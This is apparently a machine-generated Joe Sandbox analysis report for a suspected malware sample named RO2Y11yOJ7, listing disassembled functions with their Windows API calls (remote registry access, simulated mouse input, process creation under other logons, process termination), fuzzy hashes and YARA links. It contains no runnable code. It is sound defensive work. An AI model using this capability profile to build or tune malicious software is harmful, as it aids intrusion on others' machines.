                                                          • Instruction ID: a10ae6ed7e6e858a78b2f66037b140d9ff42dd0ee128887b190f955cbecd626f
                                                          • Opcode Fuzzy Hash: 7fe6833ffc20f216a3d564ae34438bba101dc299b41390e98e0434201a377c08
                                                          • Instruction Fuzzy Hash: 68618C7050065A9BCF17EF60C882EFF77A8EF46308F094559F8556F2A2DB75A901CB90
                                                          Function 003C026F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 003C0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFE38,?,?), ref: 003C0EBC
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C0348
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C0388
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003C03AB
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003C03D4
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003C0417
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003C0424
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: a52f36c4321a0a017da222b4664d6a7d46e3b0041dade95dad08e5bb07b434e2
                                                          • Instruction ID: 9c50d9bbe6e5809b64927fd0b52b0cb14b6557307550d195f9fe10dbdaf4bcab
                                                          • Opcode Fuzzy Hash: a52f36c4321a0a017da222b4664d6a7d46e3b0041dade95dad08e5bb07b434e2
                                                          • Instruction Fuzzy Hash: F3513831208240EFC71AEB64C885E6BBBE9FF85714F04891DF5959B2A2DB31E905CB52
                                                          Function 003C5802 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 003C5864
                                                          • GetMenuItemCount.USER32(00000000), ref: 003C589B
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003C58C3
                                                          • GetMenuItemID.USER32(?,?), ref: 003C5932
                                                          • GetSubMenu.USER32(?,?), ref: 003C5940
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 003C5991
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: 0378466178c231fea9b5b9339838d11b4496613da034e8d03c7613fb9ec9dcae
                                                          • Instruction ID: 46545007161ffac932e94375a8dd858b5eebef5ff21807a1d939edb19cceb7f2
                                                          • Opcode Fuzzy Hash: 0378466178c231fea9b5b9339838d11b4496613da034e8d03c7613fb9ec9dcae
                                                          • Instruction Fuzzy Hash: 10514A31A00615EFCB16AFA4C845AAEB7B5EF48320F1544A9E955FB351CB70BE818B90
                                                          Function 0039F1FE Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 0039F218
                                                          • VariantClear.OLEAUT32(00000013), ref: 0039F28A
                                                          • VariantClear.OLEAUT32(00000000), ref: 0039F2E5
                                                          • _memmove.LIBCMT ref: 0039F30F
                                                          • VariantClear.OLEAUT32(?), ref: 0039F35C
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0039F38A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                          • String ID:
                                                          • API String ID: 1101466143-0
                                                          • Opcode ID: 08162b35d7d8a404a78766ff0881fffe1642d636ca89df8cbd5e013ac27356da
                                                          • Instruction ID: afdca31ac79a52ca91486d00e4d5b58691ab8790e0ce2d5c048bf45392227914
                                                          • Opcode Fuzzy Hash: 08162b35d7d8a404a78766ff0881fffe1642d636ca89df8cbd5e013ac27356da
                                                          • Instruction Fuzzy Hash: 675148B9A00209EFCB15DF58C884AAAB7B8FF4C314F15856AE959DB300D734E951CFA0
                                                          Function 003A2502 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003A2550
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A259B
                                                          • IsMenu.USER32(00000000), ref: 003A25BB
                                                          • CreatePopupMenu.USER32 ref: 003A25EF
                                                          • GetMenuItemCount.USER32(000000FF), ref: 003A264D
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003A267E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 45cb421193cdce6d9c1f55aa1add518e93c70bd4e16d2736529b73e1cfc21bd9
                                                          • Instruction ID: 6150242453dad57f7f49b526cb8989a448d764f30cd086a957591ac14cd2af70
                                                          • Opcode Fuzzy Hash: 45cb421193cdce6d9c1f55aa1add518e93c70bd4e16d2736529b73e1cfc21bd9
                                                          • Instruction Fuzzy Hash: 9B519E70A02205DFCF26CF6CD988AAFBBF9FF46314F154159E8119B2A0DBB09904CB51
                                                          Function 00341765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0034179A
                                                          • GetWindowRect.USER32(?,?), ref: 003417FE
                                                          • ScreenToClient.USER32(?,?), ref: 0034181B
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0034182C
                                                          • EndPaint.USER32(?,?), ref: 00341876
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: faba01600d182608093e2f841b4b778eb420dc631711fad85c91d0f487545d65
                                                          • Instruction ID: 5764b5fd2088ab0ab020c97b5bb2cc692f6afd6cf2a3fcb3858a86d09c3150d1
                                                          • Opcode Fuzzy Hash: faba01600d182608093e2f841b4b778eb420dc631711fad85c91d0f487545d65
                                                          • Instruction Fuzzy Hash: 2E41A0311006049FD712DF25CC84FB77BF8EB46724F044629FAA4DB1A2C730A885DB61
                                                          Function 003CB6D2 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(004057B0,00000000,01745310,?,?,004057B0,?,003CB5DC,?,?), ref: 003CB746
                                                          • EnableWindow.USER32(00000000,00000000), ref: 003CB76A
                                                          • ShowWindow.USER32(004057B0,00000000,01745310,?,?,004057B0,?,003CB5DC,?,?), ref: 003CB7CA
                                                          • ShowWindow.USER32(00000000,00000004,?,003CB5DC,?,?), ref: 003CB7DC
                                                          • EnableWindow.USER32(00000000,00000001), ref: 003CB800
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 003CB823
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 506ce6000701c89baed31d73fc50a075f4a7c9191ae55d615e526f7d2c25c8aa
                                                          • Instruction ID: 96362a66d208bfbb48f2eaf78bd883b655ed3932dcbcb18f81733fc7c67b5b54
                                                          • Opcode Fuzzy Hash: 506ce6000701c89baed31d73fc50a075f4a7c9191ae55d615e526f7d2c25c8aa
                                                          • Instruction Fuzzy Hash: 98413934600244EFDB23CF24D48AF94BBE5BF45315F1981A9E949DF2A2C732AC55CB91
                                                          Function 003B71B3 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,003B4F57,?,?,00000000,00000001), ref: 003B71C1
                                                            • Part of subcall function 003B3AB6: GetWindowRect.USER32(?,?), ref: 003B3AC9
                                                          • GetDesktopWindow.USER32 ref: 003B71EB
                                                          • GetWindowRect.USER32(00000000), ref: 003B71F2
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003B7224
                                                            • Part of subcall function 003A52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5363
                                                          • GetCursorPos.USER32(?), ref: 003B7250
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003B72AE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: a3900f1c772a0c8521e9deea4f4f9c5dcbc99e65bbdaa17688fd359781f4b804
                                                          • Instruction ID: 221c2485648ae0795b5cd8a103cee975e17294ed3c38148ea0de8dd84a5437b7
                                                          • Opcode Fuzzy Hash: a3900f1c772a0c8521e9deea4f4f9c5dcbc99e65bbdaa17688fd359781f4b804
                                                          • Instruction Fuzzy Hash: 12318172509305AFD721DF54C849F9ABBAAFFC9314F000919F685AB191DB30EA198B92
                                                          Function 00398B3B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003983D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003983E8
                                                            • Part of subcall function 003983D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003983F2
                                                            • Part of subcall function 003983D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00398401
                                                            • Part of subcall function 003983D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00398408
                                                            • Part of subcall function 003983D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0039841E
                                                          • GetLengthSid.ADVAPI32(?,00000000,00398757), ref: 00398B8C
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00398B98
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00398B9F
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00398BB8
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00398757), ref: 00398BCC
                                                          • HeapFree.KERNEL32(00000000), ref: 00398BD3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: a6dc1303be36082748aa5e11fc0d1bacca56625d0d436669536502bfae0bed76
                                                          • Instruction ID: 6f5635335a329d533933b64a3e496ca63c02ecb3286c157b970f835416f130df
                                                          • Opcode Fuzzy Hash: a6dc1303be36082748aa5e11fc0d1bacca56625d0d436669536502bfae0bed76
                                                          • Instruction Fuzzy Hash: 5111BEB2500604FFDF129FA8CC09FAE7BADEB86315F184029E845D7250CB32AA00CB60
                                                          Function 003988D8 Relevance: 9.1, APIs: 6, Instructions: 61processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0039890A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00398911
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00398920
                                                          • CloseHandle.KERNEL32(00000004), ref: 0039892B
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039895A
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 0039896E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 8c65dc00ae0299228ef5932744ddb8226abd31d04205fbe29215d186ee8f083e
                                                          • Instruction ID: fdbc99ea42201f46dcdf7e7853e3875942352e7489d6ff6d3f864a24e1169619
                                                          • Opcode Fuzzy Hash: 8c65dc00ae0299228ef5932744ddb8226abd31d04205fbe29215d186ee8f083e
                                                          • Instruction Fuzzy Hash: F1116776500209AFDF028FA4DC48EEE7BADFB49344F044069FA04E2160C7729D20AB61
                                                          Function 0039BA52 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 0039BA77
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0039BA88
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0039BA8F
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0039BA97
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0039BAAE
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0039BAC0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 4bd69b129ea2b368b9699c00ee7320426be47bd8b84b68608f68d53688da4a46
                                                          • Instruction ID: 293d541b69f663308e29afc9d35c4413bceb580f4f35dd9a14dc9adce01a67bd
                                                          • Opcode Fuzzy Hash: 4bd69b129ea2b368b9699c00ee7320426be47bd8b84b68608f68d53688da4a46
                                                          • Instruction Fuzzy Hash: F70121B5A00218BBEF119BA69D45E5EBFA9EB48751F004065FA04E7291D670A910CF90
                                                          Function 003602E2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00360313
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0036031B
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00360326
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00360331
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00360339
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00360341
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: 36b21cb38d18cfcdb9ba8da48c04f66594a0e8074fa55569bd02ce2e8fdf2828
                                                          • Instruction ID: 6d8291223c248a1e40a0e8ccb5bc3aebd7abba42d72e2ef283b63d481a51eb77
                                                          • Opcode Fuzzy Hash: 36b21cb38d18cfcdb9ba8da48c04f66594a0e8074fa55569bd02ce2e8fdf2828
                                                          • Instruction Fuzzy Hash: E3016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A864CBE5
                                                          Function 003A5490 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003A54A0
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003A54B6
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 003A54C5
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A54D4
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A54DE
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A54E5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: 9d149093bf145d8b7bba84d53f60a666f140736e3c78ec1369470fc798dd56f1
                                                          • Instruction ID: b2b79f682c1d8a99b4a249ea6a89d815005e6fa6c8396832221c4ca03e3962d6
                                                          • Opcode Fuzzy Hash: 9d149093bf145d8b7bba84d53f60a666f140736e3c78ec1369470fc798dd56f1
                                                          • Instruction Fuzzy Hash: A8F03032241558BFE7225BA2DC0EEEF7B7DEFCAB11F040169FA04D1090D7A12A1187B5
                                                          Function 003A72D9 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 003A72EC
                                                          • EnterCriticalSection.KERNEL32(?,?,00351044,?,?), ref: 003A72FD
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00351044,?,?), ref: 003A730A
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00351044,?,?), ref: 003A7317
                                                            • Part of subcall function 003A6CDE: CloseHandle.KERNEL32(00000000,?,003A7324,?,00351044,?,?), ref: 003A6CE8
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A732A
                                                          • LeaveCriticalSection.KERNEL32(?,?,00351044,?,?), ref: 003A7331
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: 11b71ad913164b06b22495bab7836c5dfe75dcf7182f101acb3e2503e37234bf
                                                          • Instruction ID: 677938a316df98797562ca9e8e1dc38f8f89e403b50bb3aa0bad912cfba12f53
                                                          • Opcode Fuzzy Hash: 11b71ad913164b06b22495bab7836c5dfe75dcf7182f101acb3e2503e37234bf
                                                          • Instruction Fuzzy Hash: F7F03A3E140612EFEB131B64ED88DDA773EEF49312F050932F502D50A0CB756811CBA0
                                                          Function 00398C54 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00398C5F
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00398C6B
                                                          • CloseHandle.KERNEL32(?), ref: 00398C74
                                                          • CloseHandle.KERNEL32(?), ref: 00398C7C
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00398C85
                                                          • HeapFree.KERNEL32(00000000), ref: 00398C8C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
